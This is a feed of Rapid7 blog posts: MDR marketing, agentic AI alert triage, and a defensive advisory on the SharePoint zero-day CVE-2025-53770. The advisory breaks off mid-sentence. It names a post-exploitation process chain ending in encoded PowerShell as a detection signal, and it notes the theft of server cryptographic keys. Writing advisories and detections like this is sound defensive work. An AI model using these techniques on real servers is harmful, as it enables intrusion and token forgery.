<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
   xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom"
   version="2.0" xmlns:media="http://search.yahoo.com/mrss/">
  <channel>
    <title><![CDATA[ Managed Detection and Response (MDR) - Rapid7 Cybersecurity Blog ]]></title>
    <description><![CDATA[Rapid7 transforms data into insight, empowering security professionals to progress and protect their organizations.]]></description>
    <link>https://www.rapid7.com/blog/</link>
    <image>
      <url>https://blog.rapid7.com/favicon.png</url>
      <title>Rapid7 Cybersecurity Blog</title>
      <link>https://www.rapid7.com/blog/</link>
    </image>
    <lastBuildDate>Mon, 28 Jul 2025 19:17:28 GMT</lastBuildDate>
    <atom:link href="https://www.rapid7.com/tag/mdr-managed-detection-response/rss" rel="self" type="application/rss+xml" />
    <ttl>60</ttl>
    <item>
      <title><![CDATA[Staying Ahead of the Attackers: Why the Rapid7 SOC Stands Out]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>The modern security operations center (SOC) faces some very real challenges. Alert fatigue is constant. The workforce and skills gap continues to widen, and it’s not like it hasn’t been an issue for years. Meanwhile, attackers are evolving fast, using AI, automation, and novel tactics to stay ahead.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Any MDR organization can offer </span><span style='font-size: undefined;'><em>some</em></span><span style='font-size: undefined;'> support. Whether you choose a pure-play provider that brings its own technology or a BYO approach where you maintain control over platforms, most MDR offerings will give you help when you need it. Most of the time.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>But not all MDRs are created equal.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The size of the team and the flashiness of the tech stack don’t count for much if they don’t lead to better outcomes. When you’re evaluating providers, it’s easy to be drawn in by a recognizable brand or a long list of features. But the real question is this: what do those features actually deliver? After all, your goal is not more tools. It’s stronger security.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In this post, we’ll explore how service, trust, and experience directly affect your ability to stay ahead of threats. Choosing the right partner can make all the difference.</span></p><h3><span style='font-size: undefined;'>What MDR providers actually provide</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>At its core, MDR is an extension of your SOC. It fills the gaps, whether that’s expertise, bandwidth, or focus, and provides the time and attention needed to keep up with a threat landscape that never slows down. But the most effective MDRs don’t stand out because of their tools. They stand out because of their people.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Anyone can offer 24/7 support. But who’s on the other end of that alert? Do they understand your environment? Do they have the training, experience, and judgment to act fast and with confidence when it matters most? Do they follow through to resolution or simply pass the issue back to you?</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That’s what separates a provider from a true partner.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, our SOC is built on deep, hands-on expertise. Our analysts don’t just monitor. They hunt. They proactively investigate suspicious behavior, fine-tune detections, and provide guidance based on real-world context. They know your infrastructure, your risks, and your business priorities.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>And when something does go wrong, we stay with you. Rapid7 MDR includes unlimited incident response. We don’t hand off tickets or charge by the hour. We stay on the case from detection to resolution, providing full support across investigation, containment, remediation, and follow-up.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>That kind of persistence and precision is what turns promises into results.</span></p><h3><span style='font-size: undefined;'>Reputations built on trust</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>In security, reputation isn’t built on branding. It’s built through outcomes. Trust comes from showing up consistently, solving problems quickly, and understanding the full picture—not just the symptoms.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Think of it like buying a car. You don’t just look at the color or the dashboard screen. You care about the performance, the reliability, and the feel of the drive. That reputation is earned through years of engineering and design.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The same idea applies to MDR. But instead of engines and interiors, the components are world-class analysts, responsive advisors, and threat hunters who understand what makes your attack surface unique. They don’t just find threats. They help you prevent them from happening again.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'><em>“Why Rapid7? It’s the technology and the people. That’s the core point. It’s that true partnership.”</em></span><span style='font-size: undefined;'> -  Alan Simpson, Senior Security Operations Manager, Keyloop</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, we hear time and again that our customers value the confidence and clarity we bring to their teams. They know we understand their challenges. They trust us to act fast, stay focused, and support them with both expertise and empathy. That’s the reputation we’ve earned, and it’s one we bring to every engagement.</span></p><h3><span style='font-size: undefined;'>Why it all matters</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Your ability to detect and respond to threats quickly and decisively is what defines your security posture. In today’s environment, generic solutions and lightweight coverage simply aren’t enough.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7’s MDR isn’t built to check the box. It’s built to help you succeed. With unlimited incident response, proactive threat hunting, and a team that knows your environment inside and out, we don’t just provide coverage. We provide security that works.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Because when it comes down to it, staying ahead of the attackers is what matters most. With Rapid7, you may be outnumbered - but you're never outmatched.</span></p><h3><span style='font-size: undefined;'>Keep exploring</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Want to learn how to evaluate MDR solutions based on outcomes, not just features? </span><a href="https://www.rapid7.com/lp/mdr-buyers-guide/" target="_self"><span style='font-size: undefined;'><em>Download the Complete MDR Buyer’s Guide.</em></span></a><span style='font-size: undefined;'></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/staying-ahead-of-the-attackers-why-the-rapid7-soc-stands-out</link>
      <guid isPermaLink="false">blt924dcfa38aca6fe4</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Rapid7]]></dc:creator>
      <pubDate>Mon, 28 Jul 2025 15:11:57 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted8cb9466d79dc4d/6852c596a274324cfbb23d9d/PSN-gov-showcase-hero-image.png" medium="image" />
    </item>
    <item>
      <title><![CDATA[Speed, Scale, and Immediate Action with Agentic AI Workflows for MDR]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Many aspects of what makes an investigation successful are the best parts of human intelligence: judgment, contextual awareness, and strategic thinking. But the overwhelming demands of the current security landscape — with attacker breakout times </span><a href="https://www.mckinsey.com/about-us/new-at-mckinsey-blog/ai-is-the-greatest-threat-and-defense-in-cybersecurity-today"><span style='font-size: undefined;'>now under an hour</span></a><span style='font-size: undefined;'> — narrow the window for these techniques to be applied at scale. But what if you could encode the instincts of an experienced analyst into every investigation and execute at machine speed?</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For too long, security automation has meant rigid workflows and shallow actions. SOAR tools promised relief but often delivered brittle playbooks that broke with nuance or failed to adapt effectively to evolving threats or new data sources. Meanwhile, threat actors have evolved to think faster, act smarter, and scale with AI. Our defenses need to do the same.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, our view of the future of cybersecurity combines deep human expertise with intelligent systems that perceive, reason, and act with autonomy. Today, we’re proud to introduce </span><a href="https://www.rapid7.com/fundamentals/agentic-ai/" target="_self"><span style='font-size: undefined;'>agentic AI</span></a><span style='font-size: undefined;'> workflows, powered by the Rapid7 AI Engine: a system that brings structured thinking, deep analysis, and scalable decision-making to every investigation within our next-gen SIEM.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7’s global Security Operations Center (SOC) has always been driven by expert analysts who follow proven, disciplined workflows and playbooks to deliver consistent service to our customers. They work directly out of our next-gen SIEM to bring transparency and streamlined delivery to customers. Every alert is assessed rigorously: oriented, enriched, and investigated, before a response is delivered. With agentic AI workflows, we’re now scaling those principles through agentic AI, giving analysts and customers an AI partner capable of performing the same structured investigative process they’ve been conducting, visible in the same platform in seconds.</span></p><h2 style="direction: ltr;">Introducing agentic AI workflows to the Rapid7 SOC</h2><p style="direction: ltr;"><span style='font-size: undefined;'>This is where things get exciting. With agentic AI workflows we’ve reimagined how an alert gets investigated by building an intelligent partner that knows how to think, plan, and act — and surfaces the right insights to human analysts for action.</span></p><p><span style='font-size: undefined;'></span></p><p><span style='font-size: undefined;'></span><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9d835f8e71b23b73/6859620015ab48e2b6f52653/AG1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="AG1.png" asset-alt="AG1.png" inline="true" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt9d835f8e71b23b73/6859620015ab48e2b6f52653/AG1.png" data-sys-asset-uid="blt9d835f8e71b23b73" data-sys-asset-filename="AG1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="AG1.png" sys-style-type="display"/></p><p></p><p style="direction: ltr;"><span style='font-size: undefined;'>Let’s walk through how it works, step-by-step:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Getting oriented:</strong></span><span style='font-size: undefined;'> The moment an alert page loads, the agent initiates the workflow. It’s not just scanning — it’s perceiving the environment, actively taking in the alert details to build a mental model of what’s going on. Think of it as the digital equivalent of an analyst reading the room.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Calling in the specialists:</strong></span><span style='font-size: undefined;'> If the alert contains enough information, the agent taps our deterministic ML models. These are specialist models that can make fast, confident decisions — and if they can disposition the alert, the agent knows to pass it along. It’s teamwork in action.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Digging deeper:</strong></span><span style='font-size: undefined;'> If there’s not enough to go on, the agent doesn’t give up. Instead, it kicks off the next phase — seeking out more information, gathering related logs, history, and context. It’s re-orienting, expanding its situational awareness.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Thinking it through</strong></span><span style='font-size: undefined;'>: Now the real reasoning begins. The agent evaluates what it knows, considers what’s missing, and forms a plan. It's using our documented playbooks and best practices, combined with the context to figure out what questions to ask and how to find the answers.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Executing the plan: </strong></span><span style='font-size: undefined;'>Then comes action. The agent executes its plan autonomously — querying data sources, analyzing results, connecting the dots. And importantly, it documents everything along the way. It’s like having an analyst that never loses focus.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Pulling it all together:</strong></span><span style='font-size: undefined;'> Finally, the agent steps back, reviews all the information it’s gathered, and reasons about what it all means. It forms a conclusion, identifies the next steps, and packages that insight for the human analyst action. And here’s the key: the human is still in control. The Rapid7 AI Engine doesn't override; it empowers.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>Everything evaluated and surfaced is transparent, traceable, and explainable. You can see its entire train of thought directly within our next-gen </span><a href="https://www.rapid7.com/fundamentals/siem/" target="_self"><span style='font-size: undefined;'>SIEM</span></a><span style='font-size: undefined;'> — what it did, why it did it, and how it reached its recommendation. The agentic AI workflow assembles evidence, draws conclusions, and delivers it all in a way that sharpens and accelerates human judgement, rather than replacing it. </span></p><h2 style="direction: ltr;">The OSCAR Framework: A proven methodology for investigations</h2><p style="direction: ltr;"><span style='font-size: undefined;'>At the heart of every great investigation is a proven structure. The Rapid7 SOC leverages the OSCAR framework — a repeatable, rigorous approach to alert triage and resolution. It ensures investigations are efficient, consistent, and complete. Here's how it works:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Orient</strong></span><span style='font-size: undefined;'>: Analysts begin by reviewing the initial alert signal and its metadata. They determine what’s known, what’s missing, and what context is needed to make sense of the activity.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Strategize</strong></span><span style='font-size: undefined;'>: Based on the alert type, potential severity, and initial signal clarity, the analyst forms an approach: Can the issue be resolved with current data, or will it require deeper investigation?</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Collect</strong></span><span style='font-size: undefined;'>: The analyst begins data gathering. This might include historical context on the user or asset, similar past alerts, endpoint activity logs, authentication records, or threat intel correlations.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Analyze</strong></span><span style='font-size: undefined;'>: With data in hand, the analyst interprets findings: looking for behavior patterns, verifying anomaly authenticity, and cross-referencing indicators of compromise or known malicious behaviors.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Report</strong></span><span style='font-size: undefined;'>: Once the investigation is complete, the analyst summarizes their findings, outlines recommended actions, and shares outcomes with the response team or customer for final decisions and remediation.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>This method isn’t just thorough, it’s teachable, scalable, and ideal for embedding into an intelligent system. With agentic AI, every step of OSCAR can be mirrored, executed autonomously, and presented for human validation to deliver speed without compromising depth.</span></p><h2 style="direction: ltr;">Engineered for trust, built for scale</h2><p style="direction: ltr;"><span style='font-size: undefined;'>At Rapid7, AI isn’t a bolt-on or a black box. It’s a deeply integrated component of our </span><a href="https://www.rapid7.com/products/insightidr/" target="_self"><span style='font-size: undefined;'>next-gen SIEM</span></a><span style='font-size: undefined;'>, trained on workflows designed by our own SOC experts, and refined through continuous real-world application. Today, we’ve built the </span><a href="https://www.rapid7.com/blog/post/2025/03/11/helping-us-help-you-practical-applications-of-ai-in-the-soc/"><span style='font-size: undefined;'>Rapid7 AI Engine</span></a><span style='font-size: undefined;'> to inject intelligence directly within the SOC workflow, flagging anomalous behavior, triaging alerts with leading accuracy, working through the investigation lifecycle, and delivering transparent outputs for analysts and customers.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>But trust isn’t just about delivering results. It’s about how those results are achieved, and whether customers can understand, verify, and rely on them. That’s why our approach to AI is grounded in our TRiSM framework: Transparency, Risk management, Security, and Model governance.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>We’ve aligned our practices with leading standards like the NIST AI Risk Management Framework and the Open Standard for Responsible AI. That means we build AI systems with clear safeguards, evaluate them throughout their lifecycle, and hold ourselves accountable for their behavior. Transparency isn’t an afterthought; it’s built in, with every action logged and explainable inside InsightIDR.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For us, AI isn’t just a feature — it’s a responsibility. And we’re committed to innovating in a way that’s not only intelligent, but also intentional, delivering real results for SOCs around the world:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>200+ analyst hours saved per week</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Reduced false positives with 99.93% AI triage benign disposition accuracy</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Zero friction for customers</span></p></li></ul><h2 style="direction: ltr;">The future of investigations is here</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Agentic AI workflows are now starting to roll out for all MDR customers. Want to learn how Rapid7’s </span><a href="https://www.rapid7.com/services/managed-detection-and-response-mdr/" target="_self"><span style='font-size: undefined;'>Managed Detection and Response service</span></a><span style='font-size: undefined;'> can help your team scale smarter and respond faster? Reach out to our team to see how agentic AI can elevate your security outcomes from day one.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/speed-scale-and-immediate-action-with-agentic-ai-workflows-for-mdr</link>
      <guid isPermaLink="false">bltbb02d648c856ee11</guid>
      <category><![CDATA[Artificial Intelligence]]></category>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category><dc:creator><![CDATA[Laura Ellis]]></dc:creator>
      <pubDate>Fri, 25 Jul 2025 13:51:05 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0b0762ca94c50b0b/6846a711eac0e395093e52e3/AI.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[Human Framework, Machine Speed: Scaling SOC Judgment Through Agentic AI]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>In security operations, structure is a necessity. The OSCAR framework, which originated in a 2012 book about network forensics investigations, provides a disciplined approach to full scale detection and response – and it has long been the investigative backbone of the Rapid7 SOC. When stakes are high and time is limited, the framework delivers, while something flashier and more theoretical might not. But as attack surfaces expand and the tempo of threats increases, the feasibility of applying that structure consistently across thousands of alerts without intelligent assistance is diminishing.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With our </span><a href="https://www.rapid7.com/about/press-releases/rapid7-puts-agentic-ai-to-work-in-the-soc-empowering-analysts-to-investigate-smarter-and-faster/"><span style='font-size: undefined;'>recently announced agentic AI workflows</span></a><span style='font-size: undefined;'>, we're encoding OSCAR as a model of reasoning by embedding a disciplined investigation strategy directly into our next-gen SIEM. This operationalizes analysts’ best habits at speed and scale, and extends their ability to make informed decisions using the investigative discipline they already rely on.</span></p><h2><span style='color:rgb(67, 67, 67);'>OSCAR, encoded with intent </span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Every investigation begins with </span><span style='font-size: undefined;'><strong>Obtain</strong></span><span style='font-size: undefined;'>, a phase that goes beyond reading the alert. The AI agent builds a mental map; it parses the alert signal, evaluates metadata against current asset intelligence, and identifies what context is immediately available versus what is missing. For example, it may assess whether the impacted system recently changed users, is running newly deployed software, or sits within a sensitive network segment. This orientation defines the scope and hypotheses for the investigation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In </span><span style='font-size: undefined;'><strong>Strategize</strong></span><span style='font-size: undefined;'>, the agent draws from documented playbooks, but doesn’t follow them blindly. It assesses the volatility of the signal, the confidence level of any existing model classifications, and even prior alert outcomes for similar contexts. Is this a routine trigger, or does the surrounding telemetry suggest escalation potential? Strategizing helps map the right approach and keep the investigation focused and proportionate to the risk.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The </span><span style='font-size: undefined;'><strong>Collect</strong></span><span style='font-size: undefined;'> phase prioritizes relevance over volume. The agent interrogates sources contextually by reviewing alert history, target system behavior, and related log data to assemble a coherent picture. This is built to include user behavior analytics, endpoint telemetry, and enrichment from </span><a href="/fundamentals/what-is-threat-intelligence/" target="_self"><span style='font-size: undefined;'>threat intelligence</span></a><span style='font-size: undefined;'>. Rather than defaulting to static queries, it adapts based on mid-investigation findings. If an unusual parent process emerges, it expands to include sibling process behavior; if geolocation anomalies surface, it pivots to identity and access logs.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>During </span><span style='font-size: undefined;'><strong>Analyze</strong></span><span style='font-size: undefined;'>, the system applies behavioral modeling, pattern matching, and sequence reconstruction to weigh potential indicators of compromise. It surfaces inconsistencies, outliers, and supporting evidence, correlating across multiple data points to form defensible narratives.Reflecting real analyst findings, this process is iterative, contextual, and grounded in human judgment.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In </span><span style='font-size: undefined;'><strong>Report</strong></span><span style='font-size: undefined;'>, the agent compiles its findings with structured rationale: outlining the chain of logic, the confidence of disposition, and any assumptions made along the way. This delivers both a conclusion and a clear account of how that conclusion was reached, arming analysts with context they can trust and act on.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This applied investigation logic – designed to be transparent, traceable, and aligned with analyst intuition – represents a significant expansion beyond workflow automation without compromising consistency.</span></p><h2><span style='color:rgb(67, 67, 67);'>What it means for customers</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>We’re already seeing the impact of AI in the Rapid7 SOC:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>200+ analyst hours saved per week</strong></span><span style='font-size: undefined;'>, reducing fatigue and reallocating talent to proactive defense.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>99.93% benign disposition accuracy</strong></span><span style='font-size: undefined;'>, driving confidence in triage precision.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Seamless transparency via the SIEM</strong></span><span style='font-size: undefined;'>, enabling agentic outputs to appear alongside traditional investigation artifacts.</span></p></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>The efficiency gains within our SOC, and resulting benefits for customers, reflect a shift in how work gets done today. With foundational triage increasingly handled by the AI engine, analysts can now focus their time and cognitive energy on the complex, ambiguous, or higher-stakes investigations that benefit most from human insight. This allows SOCs to respond faster and smarter, tackling multi-stage intrusions, lateral movement, and evasive behaviors with more focus and fewer distractions.</span></p><p style="direction: ltr;"><a href="/fundamentals/agentic-ai/" target="_self"><span style='font-size: undefined;'>Agentic AI </span></a><span style='font-size: undefined;'>enables every alert to benefit from the same structured scrutiny our top analysts bring to priority cases – ensuring quality doesn’t degrade with volume and empowering analysts to elevate their role in the detection and response lifecycle.</span></p><h2><span style='color:rgb(67, 67, 67);'>Structured reasoning, transparent execution</span></h2><p style="direction: ltr;"><span style='font-size: undefined;'>Trust in </span><a href="/fundamentals/artificial-intelligence/" target="_self"><span style='font-size: undefined;'>AI</span></a><span style='font-size: undefined;'> needs more than results, it requires clarity and evidence. That’s why every action taken by the agent is recorded and explainable. Security leaders can inspect both the outcome and the thought process, providing auditability for internal teams and external stakeholders alike.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>With agentic AI and the OSCAR framework, we’re scaling human judgment with machine speed. And in today’s threat landscape, that may be the most important shift a SOC can make. To learn more about how agentic AI is empowering </span><a href="https://www.rapid7.com/services/managed-detection-and-response-mdr/" target="_self"><span style='font-size: undefined;'>Rapid7 MDR</span></a><span style='font-size: undefined;'>, get in touch with an expert.</span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/human-framework-machine-speed-scaling-soc-judgment-through-agentic-ai</link>
      <guid isPermaLink="false">blt642f8f17724e9df2</guid>
      <category><![CDATA[Managed Detection and Response (MDR)]]></category>
      <category><![CDATA[Artificial Intelligence]]></category><dc:creator><![CDATA[Jon Hencinski]]></dc:creator>
      <pubDate>Fri, 25 Jul 2025 13:42:06 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt0b0762ca94c50b0b/6846a711eac0e395093e52e3/AI.jpg" medium="image" />
    </item>
    <item>
      <title><![CDATA[CVE-2025-53770 - Zero-day exploitation in the wild of Microsoft SharePoint servers]]></title>
      <description><![CDATA[<h2 style="direction: ltr;">Overview</h2><p style="direction: ltr;"><span style='font-size: undefined;'>On Saturday July 19, 2025, Microsoft released an advisory for </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770"><span style='font-size: undefined;'>CVE-2025-53770</span></a><span style='font-size: undefined;'>, a critical Remote Code Execution (RCE) vulnerability affecting on-premise SharePoint servers. </span><span style='font-size: undefined;'><strong>This vulnerability has been exploited in the wild as a zero-day by an unknown threat actor prior to the disclosure from Microsoft. </strong></span><span style='font-size: undefined;'>The vulnerability is described as an unauthenticated deserialization of untrusted data issue, and has a CVSS base score of 9.8 (Critical). </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This vulnerability is being used in widespread, aggressive campaigns to achieve RCE, establish persistent access, and extract cryptographic keys that allow attackers to forge valid authentication tokens. This campaign is not opportunistic - it is deliberate, capable, and designed for persistence even after patching. Rapid7 has observed active exploitation in customer environments and is sharing indicators of compromise, and detection guidance to help defenders respond quickly.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft has described CVE-2025-53770 as being related to a previous vulnerability, </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49704"><span style='font-size: undefined;'>CVE-2025-49704</span></a><span style='font-size: undefined;'>. CVE-2025-49704 was patched in July 2025. It appears that the new vulnerability, CVE-2025-53770, is a patch bypass. Microsoft has indicated that the patches for the new vulnerability, CVE-2025-53770, include more “robust protections” than the July update for the previous vulnerability CVE-2025-49704.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft has also released an advisory for a second new vulnerability, </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53771"><span style='font-size: undefined;'>CVE-2025-53771</span></a><span style='font-size: undefined;'>. It is currently unclear if this second vulnerability is also being exploited in the wild as part of an exploit chain with CVE-2025-53770. Microsoft has indicated that the patches for CVE-2025-53771 also include more “robust protections” than the July update for another previous vulnerability CVE-2025-49706.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>To understand why the two new vulnerabilities CVE-2025-53770 and CVE-2025-53771 are related to two previous vulnerabilities CVE-2025-49704 and CVE-2025-49706, we must clarify what those older vulnerabilities are.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The previous vulnerability, CVE-2025-49704, was part of an exploit chain demonstrated at the </span><a href="https://www.zerodayinitiative.com/blog/2025/5/16/pwn2own-berlin-2025-day-two-results"><span style='font-size: undefined;'>Pwn2Own</span></a><span style='font-size: undefined;'> hacking competition in May of 2025. During the competition, Viettel Cyber Security chained together two vulnerabilities, an authentication bypass (</span><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-580/"><span style='font-size: undefined;'>CVE-2025-49706</span></a><span style='font-size: undefined;'>), and a deserialization of untrusted data vulnerability (</span><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-581/"><span style='font-size: undefined;'>CVE-2025-49704</span></a><span style='font-size: undefined;'>) to achieve unauthenticated RCE. The Pwn2Own exploit chain from May 2025 was dubbed “</span><a href="https://x.com/codewhitesec/status/1944743478350557232"><span style='font-size: undefined;'>ToolShell</span></a><span style='font-size: undefined;'>”. The new vulnerability, CVE-2025-53770, currently being exploited in the wild appears to be a patch bypass for CVE-2025-49704. It also appears that CVE-2025-53771 is a patch bypass for CVE-2025-49706, however Microsoft has indicated that CVE-2025-53771 has not been exploited in the wild.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>On Sunday July 20, 2025, CISA added CVE-2025-53770 to the </span><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog"><span style='font-size: undefined;'>Known Exploited Vulnerabilities</span></a><span style='font-size: undefined;'> (KEV) catalog.</span></p><h2 style="direction: ltr;">Mitigation guidance</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The vendor has begun to supply patches for affected SharePoint editions. Customers are advised to follow the vendor guidance, and remediate this vulnerability by upgrading to a fixed version on </span><span style='font-size: undefined;'><strong>an emergency basis</strong></span><span style='font-size: undefined;'>, without waiting for a regular patch cycle to occur.</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Server Subscription Edition is fixed in build </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.18526.20508</span></span><span style='font-size: undefined;'> (</span><a href="https://www.microsoft.com/en-us/download/details.aspx?id=108285"><span style='font-size: undefined;'>KB5002768</span></a><span style='font-size: undefined;'>).</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft SharePoint Server 2019 is fixed in build </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.10417.20037</span></span><span style='font-size: undefined;'> (</span><a href="https://www.microsoft.com/en-us/download/details.aspx?id=108286"><span style='font-size: undefined;'>KB5002754</span></a><span style='font-size: undefined;'>).</span></p></li><li><span style='font-size: undefined;'>Microsoft SharePoint Enterprise Server 2016 is fixed in build </span><span style='font-size: undefined;'><span data-type='inlineCode'>16.0.5513.1001</span></span><span style='font-size: undefined;'> (</span><a href="https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-sharepoint-enterprise-server-2016-july-21-2025-kb5002760-3ba63c92-23dd-4a1c-9f23-6dbcca9447ed"><span style='font-size: undefined;'>KB5002760</span></a><span style='font-size: undefined;'>).</span></li></ul><p style="direction: ltr;"><span style='font-size: undefined;'>For the latest mitigation guidance, please refer to the </span><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53770"><span style='font-size: undefined;'>vendor advisory</span></a><span style='font-size: undefined;'>.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In addition to applying available mitigations, organizations should:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Conduct a compromise assessment, especially if SharePoint is exposed externally.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Rotate cryptographic keys (e.g., </span><span style='font-size: undefined;'><span data-type='inlineCode'>ValidationKey</span></span><span style='font-size: undefined;'>, </span><span style='font-size: undefined;'><span data-type='inlineCode'>DecryptionKey</span></span><span style='font-size: undefined;'>) once mitigations are applied.</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Monitor for anomalous behavior on SharePoint servers and investigate any unauthorized ASPX file activity.</span></p></li></ul><h2 style="direction: ltr;">Rapid7 customers</h2><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>MDR</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Rapid7 MDR is actively detecting this activity via behavioral analytics. One effective high-confidence detection involves process chains spawned from the IIS worker process.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In particular: </span><span style='font-size: undefined;'><span data-type='inlineCode'>w3wp.exe ➝ cmd.exe ➝ powershell.exe -EncodedCommand</span></span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This pattern is not normal for SharePoint servers and should be treated as indicative of compromise and proven effective in detecting exploitation attempts of CVE-2025-53770. </span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Intelligence Hub</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-53770, including indicators of compromise (IOCs), Yara rules and emerging TTPs.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>InsightVM and Nexpose</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>InsightVM and Nexpose customers can assess exposure to CVE-2025-53770 and CVE-2025-53771 </span>with authenticated checks available in the July 21 content release<span style='font-size: undefined;'>. Authenticated checks for CVE-2025-49704 and CVE-2025-49706 